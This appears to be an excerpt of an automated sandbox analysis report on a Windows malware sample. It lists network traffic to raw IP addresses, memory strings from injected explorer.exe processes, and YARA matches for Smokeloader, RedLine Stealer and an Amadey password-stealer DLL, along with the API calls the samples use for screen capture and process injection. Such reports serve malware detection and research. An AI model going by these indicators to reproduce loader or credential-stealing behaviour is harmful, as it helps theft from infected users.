                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.236.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                              Source: unknownTCP traffic detected without corresponding DNS query: 23.35.237.194
                              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 2.20.195.105
                              Source: unknownTCP traffic detected without corresponding DNS query: 2.20.195.105
                              Source: unknownTCP traffic detected without corresponding DNS query: 2.20.195.105
                              Source: unknownTCP traffic detected without corresponding DNS query: 8.238.85.254
                              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 8.238.88.254
                              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
                              Source: unknownTCP traffic detected without corresponding DNS query: 8.238.88.254
                              Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.228
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.rambler.ru (Rambler)
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=|:|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.yahoo.com (Yahoo)
                              Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                              Source: unknownHTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49697 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.98.131.207:443 -> 192.168.2.3:49723 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.190.159.19:443 -> 192.168.2.3:49728 version: TLS 1.2

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Source: Yara matchFile source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1020, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                              Source: Yara matchFile source: 43.3.thgcici.490000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.6a0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.kmxId0uLRn.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.3.thgcici.2090000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.470e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD2DA0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,14_2_00DD2DA0
                              Source: 9545.exe, 0000000E.00000002.419598759.00000000013DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                              System Summary

                              barindex
                              Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000000B.00000002.456935359.00000000006C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000000B.00000002.456463598.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000001A.00000000.423609338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 0000002B.00000002.603006628.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 0000002B.00000002.603522638.00000000004A4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 00000000.00000002.354530381.0000000000631000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000000.00000002.354314042.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                              Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 268
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_0040D0080_2_0040D008
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00409C200_2_00409C20
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_0040CAC40_2_0040CAC4
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_0040F7FC0_2_0040F7FC
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_0040C5800_2_0040C580
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_0040D00811_2_0040D008
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_00409C2011_2_00409C20
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_0040CAC411_2_0040CAC4
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_0040F7FC11_2_0040F7FC
                              Source: C:\Users\user\AppData\Roaming\thgciciCode function: 11_2_0040C58011_2_0040C580
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C120E012_2_00C120E0
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C1C3DB12_2_00C1C3DB
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2E32A12_2_00C2E32A
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C1255012_2_00C12550
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2850912_2_00C28509
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2C8AE12_2_00C2C8AE
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C1F96012_2_00C1F960
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C3090C12_2_00C3090C
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C30A2C12_2_00C30A2C
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C24BEE12_2_00C24BEE
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DF8C7D14_2_00DF8C7D
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DF9C6014_2_00DF9C60
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD77C014_2_00DD77C0
                              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
                              Source: kmxId0uLRn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000000B.00000002.456935359.00000000006C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000000B.00000002.456463598.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000001A.00000000.423609338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 0000002B.00000002.603006628.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 0000002B.00000002.603522638.00000000004A4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 00000000.00000002.354530381.0000000000631000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000000.00000002.354314042.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                              Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, type: DROPPEDMatched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: String function: 00C17D30 appears 49 times
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: String function: 00DE9420 appears 35 times
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: String function: 00DE76C0 appears 130 times
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015D5
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00401602 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401602
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00401605 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401605
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00401609 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401609
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00401613 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401613
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_00401617 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401617
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_004015D4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015D4
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015E0
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_004015EA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015EA
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeCode function: 0_2_004015EE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015EE
